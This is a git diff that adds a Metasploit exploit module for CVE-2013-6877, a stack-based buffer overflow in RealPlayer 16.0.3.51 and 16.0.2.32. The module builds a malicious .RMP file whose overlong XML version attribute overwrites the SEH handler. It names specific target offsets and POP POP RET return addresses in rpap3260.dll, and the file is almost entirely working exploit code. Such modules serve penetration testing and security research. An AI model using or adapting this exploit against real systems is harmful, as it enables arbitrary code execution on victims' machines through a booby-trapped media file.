diff --git a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb new file mode 100644 index 0000000000..e9d022bfe9 --- /dev/null +++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb @@ -0,0 +1,91 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => + 'RealNetworks RealPlayer Version Attribute Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability in + version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by + improper bounds checking of the version and encoding attributes inside + the XML declaration. + + By persuading the victim to open a specially-crafted .RMP file, a + remote attacker could execute arbitrary code on the system or cause + the application to crash. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Gabor Seljan' # Vulnerability discovery and Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-6877' ], + [ 'URL', 'http://service.real.com/realplayer/security/12202013_player/en/' ] + ], + 'DefaultOptions' => + { + 'ExitFunction' => 'seh' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x22", + 'Space' => 532, + }, + 'Targets' => + [ + [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.3.51', + { + 'Offset' => 2540, + 'Ret' => 0x641930c8, # POP POP RET from rpap3260.dll + 'Max' => 3095, # overflow occurs at 3080 byte + } + ], + [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.2.32', + { + 'Offset' => 2540, + 'Ret' => 0x63A630B8, # POP POP RET from rpap3260.dll + 'Max' => 3095, # overflow occurs at 3080 byte + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Dec 20, 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.rmp']), + ], + self.class) + + end + + def exploit + + sploit = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22" + sploit << rand_text_alpha_upper(target['Offset']) + sploit << generate_seh_payload(target.ret) + sploit << make_nops(target['Max']-sploit.length) + sploit << "\x22\x3f\x3e\x3b" + + # Create the file + print_status("Creating '#{datastore['FILENAME']}' file ...") + + file_create(sploit) + + end +end \ No newline at end of file